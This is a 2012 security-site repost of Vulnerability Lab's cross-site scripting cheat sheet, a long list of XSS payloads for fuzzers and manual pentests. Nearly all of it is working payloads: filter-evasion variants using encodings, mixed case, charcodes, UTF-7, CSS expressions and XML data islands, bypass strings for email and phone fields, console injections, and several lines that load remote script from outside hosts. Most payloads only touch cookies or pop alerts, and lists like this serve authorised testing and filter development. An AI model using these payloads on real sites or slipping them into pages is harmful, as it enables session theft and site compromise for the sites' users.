what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Cross Site Scripting Payloads

Cross Site Scripting Payloads
Posted Apr 24, 2012
Site vulnerability-lab.com

Vulnerability Lab has produced a large amount of cross site scripting payloads that can be used with fuzzers for automated scanning, etc.

tags | paper, xss, fuzzer
SHA-256 | 71078b2183d9cc07ac1636ddcb7060fb73257b6ebaedff466a4e3c1617e9defc

Cross Site Scripting Payloads

Change Mirror Download
_________                                _________.__  __             _________            .__        __  .__                
\_ ___ \_______ ____ ______ ______ / _____/|__|/ |_ ____ / _____/ ___________|__|______/ |_|__| ____ ____
/ \ \/\_ __ \/ _ \/ ___// ___/ \_____ \ | \ __\/ __ \ \_____ \_/ ___\_ __ \ \____ \ __\ |/ \ / ___\
\ \____| | \( <_> )___ \ \___ \ / \| || | \ ___/ / \ \___| | \/ | |_> > | | | | \/ /_/ >
\______ /|__| \____/____ >____ > /_______ /|__||__| \___ > /_______ /\___ >__| |__| __/|__| |__|___| /\___ /
\/ \/ \/ \/ \/ \/ \/ |__| \//_____/

Information:
A lot of people asked us regarding our cross site scripting pentest sheet for a fuzzer or own scripts. To have
some good results you can use the following list with automatic scripts, software or for manually pentesting. This
list goes out to all friends, nerds, pentester & exploiters. Please continue the List and we will update it soon.

Note: This is a technical attack sheet for cross site penetrationtests.



Cross Site Scripting Strings with TAG:

<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
<SCRIPT>document.cookie=true;</SCRIPT>
<IMG SRC="jav ascript:document.cookie=true;">
<IMG SRC="javascript:document.cookie=true;">
<IMG SRC="  javascript:document.cookie=true;">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
<SCRIPT>document.cookie=true;//<</SCRIPT>
<SCRIPT <B>document.cookie=true;</SCRIPT>
<IMG SRC="javascript:document.cookie=true;">
<iframe src="javascript:document.cookie=true;>
<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
<BODY BACKGROUND="javascript:document.cookie=true;">
<BODY ONLOAD=document.cookie=true;>
<IMG DYNSRC="javascript:document.cookie=true;">
<IMG LOWSRC="javascript:document.cookie=true;">
<BGSOUND SRC="javascript:document.cookie=true;">
<BR SIZE="&{document.cookie=true}">
<LAYER SRC="javascript:document.cookie=true;"></LAYER>
<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting
¼script¾document.cookie=true;¼/script¾
<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
<TABLE BACKGROUND="javascript:document.cookie=true;">
<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
<DIV STYLE="width: expression(document.cookie=true);">
<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)">
exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'>
<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A>
<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
<SCRIPT>document.cookie=true;</SCRIPT>
<BASE HREF="javascript:document.cookie=true;//">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
<a href="javascript#document.cookie=true;">
<div onmouseover="document.cookie=true;">
<img src="javascript:document.cookie=true;">
<img dynsrc="javascript:document.cookie=true;">
<input type="image" dynsrc="javascript:document.cookie=true;">
<bgsound src="javascript:document.cookie=true;">
&<script>document.cookie=true;</script>
&{document.cookie=true;};
<img src=&{document.cookie=true;};>
<link rel="stylesheet" href="javascript:document.cookie=true;">
<img src="mocha:document.cookie=true;">
<img src="livescript:document.cookie=true;">
<a href="about:<script>document.cookie=true;</script>">
<body onload="document.cookie=true;">
<div style="background-image: url(javascript:document.cookie=true;);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression(document.cookie=true;);">
<style type="text/javascript">document.cookie=true;</style>
<object classid="clsid:..." codebase="javascript:document.cookie=true;">
<style><!--</style><script>document.cookie=true;//--></script>
<<script>document.cookie=true;</script>
<script>document.cookie=true;//--></script>
<!-- -- --><script>document.cookie=true;</script><!-- -- -->
<img src="blah"onmouseover="document.cookie=true;">
<img src="blah>" onmouseover="document.cookie=true;">
<xml src="javascript:document.cookie=true;">
<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>



Cross Site Scripting Strings with close TAG:

>"<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
>"<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
>"<SCRIPT>document.cookie=true;</SCRIPT>
>"<IMG SRC="jav ascript:document.cookie=true;">
>"<IMG SRC="javascript:document.cookie=true;">
>"<IMG SRC="  javascript:document.cookie=true;">
>"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
>"<SCRIPT>document.cookie=true;//<</SCRIPT>
>"<SCRIPT <B>document.cookie=true;</SCRIPT>
>"<IMG SRC="javascript:document.cookie=true;">
>"<iframe src="javascript:document.cookie=true;>
>"<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
>"</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
>"<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
>"<BODY BACKGROUND="javascript:document.cookie=true;">
>"<BODY ONLOAD=document.cookie=true;>
>"<IMG DYNSRC="javascript:document.cookie=true;">
>"<IMG LOWSRC="javascript:document.cookie=true;">
>"<BGSOUND SRC="javascript:document.cookie=true;">
>"<BR SIZE="&{document.cookie=true}">
>"<LAYER SRC="javascript:document.cookie=true;"></LAYER>
>"<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
>"<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting
>"¼script¾document.cookie=true;¼/script¾
>"<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
>"<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
>"<TABLE BACKGROUND="javascript:document.cookie=true;">
>"<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
>"<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
>"<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
>"<DIV STYLE="width: expression(document.cookie=true);">
>"<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
>"<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
>"<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)">
>"exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'>
>"<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
>"<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A>
>"<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
>"<SCRIPT>document.cookie=true;</SCRIPT>
>"<BASE HREF="javascript:document.cookie=true;//">
>"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
>"<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
>"<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
>"<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
>"<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
>"<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
>"<a href="javascript#document.cookie=true;">
>"<div onmouseover="document.cookie=true;">
>"<img src="javascript:document.cookie=true;">
>"<img dynsrc="javascript:document.cookie=true;">
>"<input type="image" dynsrc="javascript:document.cookie=true;">
>"<bgsound src="javascript:document.cookie=true;">
>"&<script>document.cookie=true;</script>
>"&{document.cookie=true;};
>"<img src=&{document.cookie=true;};>
>"<link rel="stylesheet" href="javascript:document.cookie=true;">
>"<img src="mocha:document.cookie=true;">
>"<img src="livescript:document.cookie=true;">
>"<a href="about:<script>document.cookie=true;</script>">
>"<body onload="document.cookie=true;">
>"<div style="background-image: url(javascript:document.cookie=true;);">
>"<div style="behaviour: url([link to code]);">
>"<div style="binding: url([link to code]);">
>"<div style="width: expression(document.cookie=true;);">
>"<style type="text/javascript">document.cookie=true;</style>
>"<object classid="clsid:..." codebase="javascript:document.cookie=true;">
>"<style><!--</style><script>document.cookie=true;//--></script>
>"<<script>document.cookie=true;</script>
>"<script>document.cookie=true;//--></script>
>"<!-- -- --><script>document.cookie=true;</script><!-- -- -->
>"<img src="blah"onmouseover="document.cookie=true;">
>"<img src="blah>" onmouseover="document.cookie=true;">
>"<xml src="javascript:document.cookie=true;">
>"<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
>"<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>



Cross Site Scripting Strings with negative value & TAG:
-1<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
-1<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
-1<SCRIPT>document.cookie=true;</SCRIPT>
-1<IMG SRC="jav ascript:document.cookie=true;">
-1<IMG SRC="javascript:document.cookie=true;">
-1<IMG SRC="  javascript:document.cookie=true;">
-1<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
-1<SCRIPT>document.cookie=true;//<</SCRIPT>
-1<SCRIPT <B>document.cookie=true;</SCRIPT>
-1<IMG SRC="javascript:document.cookie=true;">
-1<iframe src="javascript:document.cookie=true;>
-1<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
-1</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
-1<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
-1<BODY BACKGROUND="javascript:document.cookie=true;">
-1<BODY ONLOAD=document.cookie=true;>
-1<IMG DYNSRC="javascript:document.cookie=true;">
-1<IMG LOWSRC="javascript:document.cookie=true;">
-1<BGSOUND SRC="javascript:document.cookie=true;">
-1<BR SIZE="&{document.cookie=true}">
-1<LAYER SRC="javascript:document.cookie=true;"></LAYER>
-1<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
-1<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting
-1¼script¾document.cookie=true;¼/script¾
-1<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
-1<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
-1<TABLE BACKGROUND="javascript:document.cookie=true;">
-1<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
-1<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
-1<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
-1<DIV STYLE="width: expression(document.cookie=true);">
-1<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
-1<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
-1<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)">
-1exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'>
-1<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
-1<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A>
-1<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
-1<SCRIPT>document.cookie=true;</SCRIPT>
-1<BASE HREF="javascript:document.cookie=true;//">
-1<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
-1<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
-1<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
-1<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
-1<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
-1<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
-1<a href="javascript#document.cookie=true;">
-1<div onmouseover="document.cookie=true;">
-1<img src="javascript:document.cookie=true;">
-1<img dynsrc="javascript:document.cookie=true;">
-1<input type="image" dynsrc="javascript:document.cookie=true;">
-1<bgsound src="javascript:document.cookie=true;">
-1&<script>document.cookie=true;</script>
-1&{document.cookie=true;};
-1<img src=&{document.cookie=true;};>
-1<link rel="stylesheet" href="javascript:document.cookie=true;">
-1<img src="mocha:document.cookie=true;">
-1<img src="livescript:document.cookie=true;">
-1<a href="about:<script>document.cookie=true;</script>">
-1<body onload="document.cookie=true;">
-1<div style="background-image: url(javascript:document.cookie=true;);">
-1<div style="behaviour: url([link to code]);">
-1<div style="binding: url([link to code]);">
-1<div style="width: expression(document.cookie=true;);">
-1<style type="text/javascript">document.cookie=true;</style>
-1<object classid="clsid:..." codebase="javascript:document.cookie=true;">
-1<style><!--</style><script>document.cookie=true;//--></script>
-1<<script>document.cookie=true;</script>
-1<script>document.cookie=true;//--></script>
-1<!-- -- --><script>document.cookie=true;</script><!-- -- -->
-1<img src="blah"onmouseover="document.cookie=true;">
-1<img src="blah>" onmouseover="document.cookie=true;">
-1<xml src="javascript:document.cookie=true;">
-1<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
-1<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>


Cross Site Scripting Strings Restriction Bypass Mail:

>"<iframe src=http://vulnerability-lab.com/>@gmail.com
>"<script>alert(document.cookie)</script><div style="1@gmail.com
>"<script>alert(document.cookie)</script>@gmail.com

<iframe src=http://vulnerability-lab.com/>@gmail.com
<script>alert(document.cookie)</script><div style="1@gmail.com
<script>alert(document.cookie)</script>@gmail.com


Cross Site Scripting Strings Restriction Bypass Phone:
+49/>"<iframe src=http://vulnerability-lab.com>1337
"><iframe src='' onload=alert('mphone')>
<iframe src=http://vulnerability-lab.com>1337+1


Cross Site Scripting Strings Restriction Bypass Obfuscation

>“<ScriPt>ALeRt("VlAb")</scriPt>
>"<IfRaMe sRc=hTtp://vulnerability-lab.com></IfRaMe>


Cross Site Scripting Strings Restriction Bypass String to Charcode

<html><body>
<button.onclick="alert(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,
101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,1
10,103,64,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));">String:fr
om.Char.Code</button></body></html>


';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//\";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))</SCRIPT>
'';!--"<CrossSiteScripting>=&{()}



Cross Site Scripting Strings Restriction Bypass encoded frame url

%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F
%73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F
%73%63%72%69%70%74%3E



Cross Site Scripting Strings via Console:
set vlan name 1337 <script>alert(document.cookie)</script>
set system name <iframe src=http://www.vulnerability-lab.com>
set system location "><iframe src=a onload=alert("VL") <
set system contact <script>alert('VL')</script>

insert <script>alert(document.cookie)</script>
add <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>'"-->
add user <script>alert(document.cookie)</script> <script>alert(document.cookie)</script>@gmail.com

add topic <iframe src=http://www.vulnerability-lab.com>
add name <script>alert('VL')</script>

perl -e 'print "<IMG SRC=java\0script:alert(\"CrossSiteScripting\")>";' > out
perl -e 'print "<SCR\0IPT>alert(\"CrossSiteScripting\")</SCR\0IPT>";' > out

<!--[if gte IE 4]> <SCRIPT>alert('CrossSiteScripting');</SCRIPT> <![endif]-->




Cross Site Scripting Strings on per line validation applications:

<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
V
L
A
B
'
)
"
>



Cross Site Scripting Strings Embed:

<EMBED SRC="http://vulnerability-lab.com/CrossSiteScripting.swf" AllowScriptAccess="always"></EMBED>

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>



Cross Site Scripting Strings Action Script:

<object type="application/x-shockwave-flash" data="http://www.vulnerability-lab.com/hack.swf" width="300" height="300">
<param name="movie" value="http://www.subhohalder.com/xysecteam.swf" />
<param name="quality" value="high" />
<param name="scale" value="noscale" />
<param name="salign" value="LT" />
<param name="allowScriptAccess" value="always" />
<param name="menu" value="false" />
</object>




<SCRIPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>
<<SCRIPT>alert("CrossSiteScripting");//<</SCRIPT>
<SCRIPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js?<B>
<SCRIPT SRC=//vulnerability-lab.com/.js>
<SCRIPT>a=/CrossSiteScripting/ alert(a.source)</SCRIPT>
<SCRIPT a=">" SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
</TITLE><SCRIPT>alert("CrossSiteScripting");</SCRIPT>


<IMG SRC="javascript:alert('CrossSiteScripting');">
<IMG SRC=javascript:alert('CrossSiteScripting')>
<IMG SRC=JaVaScRiPt:alert('CrossSiteScripting')>
<IMG SRC=javascript:alert("CrossSiteScripting")>
<IMG SRC=`javascript:alert("RM'CrossSiteScripting'")`>
<IMG """><SCRIPT>alert("CrossSiteScripting")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC="jav ascript:alert('CrossSiteScripting');">
<IMG SRC="jav&#x09;ascript:alert('CrossSiteScripting');">
<IMG SRC="jav&#x0A;ascript:alert('CrossSiteScripting');">
<IMG SRC="jav&#x0D;ascript:alert('CrossSiteScripting');">
<IMG SRC="  javascript:alert('CrossSiteScripting');">
<IMG SRC="javascript:alert('CrossSiteScripting')"
<IMG DYNSRC="javascript:alert('CrossSiteScripting')">
<IMG LOWSRC="javascript:alert('CrossSiteScripting')">
<IMG SRC='vbscript:msgbox("CrossSiteScripting")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">


<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('CrossSiteScripting');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=jAvAsCriPt:aLeRt('CroSsSiteScrIpting');">
<META HTTP-EQUIV="Link" Content="<http://vulnerability-lab.com/CrossSiteScripting.css>; REL=stylesheet">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('CrossSiteScripting')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('CrossSiteScripting');+ADw-/SCRIPT+AD4-


<OBJECT TYPE="text/x-scriptlet" DATA="http://vulnerability-lab.com/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('CrossSiteScripting')></OBJECT>


<STYLE>@im\port'\ja\vasc\ript:alert("CrossSiteScripting")';</STYLE>
<STYLE>@import'http://vulnerability-lab.com/CrossSiteScripting.css';</STYLE>
<STYLE TYPE="text/javascript">alert('CrossSiteScripting');</STYLE>
<STYLE>.CrossSiteScripting{background-image:url("javascript:alert('CrossSiteScripting')");}</STYLE><A CLASS=CrossSiteScripting></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('CrossSiteScripting')")}</STYLE>
<STYLE>li {list-style-image: url("javascript:alert('CrossSiteScripting')");}</STYLE><UL><LI>CrossSiteScripting
<STYLE>BODY{-moz-binding:url("http://vulnerability-lab.com/CrossSiteScriptingmoz.xml#CrossSiteScripting")}</STYLE>


<DIV STYLE="background-image: url(javascript:alert('CrossSiteScripting'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(javascript:alert('CrossSiteScripting'))">
<DIV STYLE="width: expression(alert('CrossSiteScripting'));">

<LAYER SRC="http://vulnerability-lab.com/script.html"></LAYER>
<LINK REL="stylesheet" HREF="javascript:alert('CrossSiteScripting');">
<LINK REL="stylesheet" HREF="http://vulnerability-lab.com/CrossSiteScripting.css">

<BODY BACKGROUND="javascript:alert('CrossSiteScripting')">
<BODY ONLOAD=alert('CrossSiteScripting')>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("CrossSiteScripting")>
<iframe src=http://vulnerability-lab.com/index.html <


<TABLE BACKGROUND="javascript:alert('CrossSiteScripting')">
<TABLE><TD BACKGROUND="javascript:alert('CrossSiteScripting')">

<BGSOUND SRC="javascript:alert('CrossSiteScripting');">
<BR SIZE="&{alert('CrossSiteScripting')}">


<A HREF="http://server.com/">CrossSiteScripting</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">CrossSiteScripting</A>
<A HREF="http://1113982867/">CrossSiteScripting</A>
<A HREF="javascript:document.location='http://www.vulnerability-lab.com/'">CrossSiteScripting</A>

<BASE HREF="javascript:alert('CrossSiteScripting');//">

\";alert('CrossSiteScripting');//

<INPUT TYPE="IMAGE" SRC="javascript:alert('CrossSiteScripting');">




<CrossSiteScripting STYLE="behavior: url(CrossSiteScripting.htc);">


¼script¾alert(¢CrossSiteScripting¢)¼/script¾



<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(alert('CrossSiteScripting'))">
<CrossSiteScripting STYLE="CrossSiteScripting:expression(alert('CrossSiteScripting'))"> exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*"); CrossSiteScripting:ex&#x2F;*CrossSiteScripting*//*/*/pression(alert("CrossSiteScripting"))'>





a="get";
b="URL(\"";
c="javascript:";
d="alert('CrossSiteScripting');\")";
eval(v+l+a+b);

<HTML xmlns:CrossSiteScripting>
<?import namespace="CrossSiteScripting" implementation="http://ha.ckers.org/CrossSiteScripting.htc">
<CrossSiteScripting:CrossSiteScripting>CrossSiteScripting</CrossSiteScripting:CrossSiteScripting>

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('CrossSiteScripting');">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>


<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:alert('CrossSiteScripting')"></B></I></XML>
<SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>


<XML SRC="CrossSiteScriptingtest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>alert("CrossSiteScripting")</SCRIPT>">
</BODY></HTML>

<SCRIPT SRC="http://vulnerability-lab.com/CrossSiteScripting.jpg"></SCRIPT>

<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>'"-->

<? echo('<SCR)';
echo('IPT>alert("CrossSiteScripting")</SCRIPT>'); ?>

<IMG SRC="http://www.vulnerability-lab.com/file.php?variables=malicious">

Redirect 302 /vlab.jpg http://vulnerability-lab.com/admin.asp&deleteuser




%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E

&#x3C;&#x69;&#x66;&#x72;&#x61;&#x6D;&#x65;&#x20;&#x73;&#x72;&#x63;&#x3D;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x74;&#x65;&#x73;&#x74;&#x2E;&#x64;&#x65;&#x3E;

